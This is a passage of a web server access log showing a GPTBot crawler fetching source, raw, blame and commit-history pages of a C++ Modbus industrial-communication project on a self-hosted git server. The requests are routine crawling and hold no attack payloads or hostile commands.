+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10083] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12761] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10242] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10242] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10248] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9996] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10522] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11430] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11170] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10434] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13636] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:16:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10229] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12012] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12881] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:16:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:16:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10523] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10082] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10522] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11820] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11316] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:16:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11315] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12758] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10236] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:16:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11168] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12894] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10242] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11521] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11520] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10432] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12509] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10084] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 